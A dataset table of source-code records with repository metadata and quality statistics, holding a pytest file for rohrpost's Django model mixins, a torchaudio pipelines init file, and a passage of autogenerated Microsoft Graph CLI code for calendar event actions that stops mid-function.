hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
059a79f4cb500453c638389abdb21db87068390d | 13,045 | py | Python | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 8 | 2017-01-02T08:41:36.000Z | 2019-11-06T06:19:58.000Z | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 6 | 2017-04-28T12:23:27.000Z | 2018-09-03T14:56:46.000Z | tests/test_mixins.py | axsemantics/rohrpost | d020a354d58ce591d534507d1f53ce7331c01e8a | [
"MIT"
] | 1 | 2018-08-29T14:47:53.000Z | 2018-08-29T14:47:53.000Z | import json
from collections import defaultdict
LOGGED_DATA = defaultdict(list)
def mocked_send_to_group(*, group_name, message):
LOGGED_DATA[group_name].append(json.loads(message))
def mocked_transaction_commit(func):
func()
def test_without_name(plain_obj, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 1
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
# update
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 2
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
# delete
plain_obj.delete()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 3
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["plainexamplemodel-1"] = []
def test_send_update_fields(plain_obj, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
plain_obj.save()
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 1
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"updated_fields" not in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]
)
# update without fields
plain_obj.save(update_fields=[])
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 2
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"updated_fields" not in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]
)
# update with fields
plain_obj.save(update_fields=["something", "something_else"])
assert len(LOGGED_DATA["plainexamplemodel-1"]) == 3
assert LOGGED_DATA["plainexamplemodel-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["id"] == 1
assert (
"something_else"
in LOGGED_DATA["plainexamplemodel-1"][-1]["data"]["object"]["updated_fields"]
)
def test_with_attribute_name(obj_with_attr, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_attr.save()
assert len(LOGGED_DATA["attribute-example-1"]) == 1
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_attr.save()
assert len(LOGGED_DATA["attribute-example-1"]) == 2
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_attr.delete()
assert len(LOGGED_DATA["attribute-example-1"]) == 3
assert LOGGED_DATA["attribute-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["attribute-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["attribute-example-1"] = []
def test_with_method_name(obj_with_method, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_method.save()
assert len(LOGGED_DATA["method-example-1"]) == 1
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_method.save()
assert len(LOGGED_DATA["method-example-1"]) == 2
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_method.delete()
assert len(LOGGED_DATA["method-example-1"]) == 3
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["method-example-1"] = []
def test_with_method_and_attr(obj_with_method_and_attr, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_method_and_attr.save()
assert len(LOGGED_DATA["method-example-1"]) == 1
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "create"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# update
obj_with_method_and_attr.save()
assert len(LOGGED_DATA["method-example-1"]) == 2
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
# delete
obj_with_method_and_attr.delete()
assert len(LOGGED_DATA["method-example-1"]) == 3
assert LOGGED_DATA["method-example-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["method-example-1"][-1]["data"]["type"] == "delete"
assert LOGGED_DATA["method-example-1"][-1]["data"]["object"]["id"] == 1
LOGGED_DATA["method-example-1"] = []
def test_with_additional_data(obj_with_data, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_data.save()
assert len(LOGGED_DATA["modelwithdata-1"]) == 1
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
# update
obj_with_data.save()
assert len(LOGGED_DATA["modelwithdata-1"]) == 2
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
# delete
obj_with_data.delete()
assert len(LOGGED_DATA["modelwithdata-1"]) == 3
assert LOGGED_DATA["modelwithdata-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithdata-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithdata-1"][-1]["data"]["object"]
LOGGED_DATA["modelwithdata-1"] = []
def test_with_serializer(obj_with_serializer, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_serializer.save()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 1
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
# update
obj_with_serializer.save()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 2
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
# delete
obj_with_serializer.delete()
assert len(LOGGED_DATA["modelwithserializer-1"]) == 3
assert LOGGED_DATA["modelwithserializer-1"][-1]["type"] == "subscription-update"
assert LOGGED_DATA["modelwithserializer-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_id"] == 1
)
assert (
LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]["serialized_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializer-1"][-1]["data"]["object"]
LOGGED_DATA["modelwithserializer-1"] = []
def test_with_serializer_and_data(obj_with_serializer_and_data, monkeypatch):
monkeypatch.setattr("rohrpost.mixins.send_to_group", mocked_send_to_group)
monkeypatch.setattr(
"rohrpost.mixins.on_transaction_commit", mocked_transaction_commit
)
# create
obj_with_serializer_and_data.save()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 1
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "create"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
# update
obj_with_serializer_and_data.save()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 2
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "update"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
# delete
obj_with_serializer_and_data.delete()
assert len(LOGGED_DATA["modelwithserializeranddata-1"]) == 3
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["type"] == "subscription-update"
)
assert LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["type"] == "delete"
assert (
LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]["extra_name"]
== "test object name"
)
assert "id" not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
assert (
"serialized_id"
not in LOGGED_DATA["modelwithserializeranddata-1"][-1]["data"]["object"]
)
LOGGED_DATA["modelwithserializeranddata-1"] = []
| 41.15142 | 88 | 0.664392 | 1,550 | 13,045 | 5.385161 | 0.04 | 0.147358 | 0.143764 | 0.060381 | 0.944531 | 0.930754 | 0.897688 | 0.889541 | 0.869294 | 0.864502 | 0 | 0.022828 | 0.150402 | 13,045 | 316 | 89 | 41.281646 | 0.730308 | 0.014872 | 0 | 0.65587 | 0 | 0 | 0.363013 | 0.113753 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.040486 | false | 0 | 0.008097 | 0 | 0.048583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
05b8402cd3b2795513d651754bfda2d75cf27fcc | 164 | py | Python | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | torchaudio/prototype/pipelines/__init__.py | ishine/audio | 7444f56819f679f68eee8bf915bbb74be3da0e40 | [
"BSD-2-Clause"
] | null | null | null | from .rnnt_pipeline import EMFORMER_RNNT_BASE_MUSTC, EMFORMER_RNNT_BASE_TEDLIUM3
__all__ = [
"EMFORMER_RNNT_BASE_MUSTC",
"EMFORMER_RNNT_BASE_TEDLIUM3",
]
| 20.5 | 80 | 0.804878 | 21 | 164 | 5.47619 | 0.428571 | 0.417391 | 0.556522 | 0.365217 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0 | 0 | 0 | 0.013986 | 0.128049 | 164 | 7 | 81 | 23.428571 | 0.79021 | 0 | 0 | 0 | 0 | 0 | 0.310976 | 0.310976 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
05cb7d1e7be86c508454be8e20d8bbac63b1ce91 | 350,881 | py | Python | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | 22 | 2022-03-29T22:54:37.000Z | 2022-03-29T22:55:27.000Z | msgraph/cli/command_modules/usersactions/azext_usersactions/generated/custom.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
def usersactions_userscalendarviewattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewcalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarviewinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendarviewinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarviewinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarview_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_userscalendarview_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarview_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventsattachment_create_upload_session(client,
user_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventscalendar_get_schedule(client,
user_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendareventsinstance_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_decline(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_dismiss_reminder(client,
user_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendareventsinstance_snooze_reminder(client,
user_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendareventsinstance_tentatively_accept(client,
user_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendarevent_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_decline(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_dismiss_reminder(client,
user_id,
event_id):
return client.dismiss_reminder(user_id=user_id,
event_id=event_id)
def usersactions_userscalendarevent_snooze_reminder(client,
user_id,
event_id,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendarevent_tentatively_accept(client,
user_id,
event_id,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
event_id=event_id,
body=body)
def usersactions_userscalendar_get_schedule(client,
user_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewattachment_create_upload_session(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
attachment_item=None):
body = {}
if attachment_item is not None:
body['attachment_item'] = attachment_item
return client.create_upload_session(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewcalendar_get_schedule(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
schedules=None,
end_time=None,
start_time=None,
availability_view_interval=None):
body = {}
if schedules is not None:
body['schedules'] = schedules
if end_time is not None:
body['end_time'] = end_time
if start_time is not None:
body['start_time'] = start_time
if availability_view_interval is not None:
body['availability_view_interval'] = availability_view_interval
return client.get_schedule(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_decline(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.decline(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_dismiss_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1):
return client.dismiss_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1)
def usersactions_userscalendargroupscalendarscalendarviewinstance_snooze_reminder(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
new_reminder_time=None):
body = {}
if new_reminder_time is not None:
body['new_reminder_time'] = new_reminder_time
return client.snooze_reminder(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
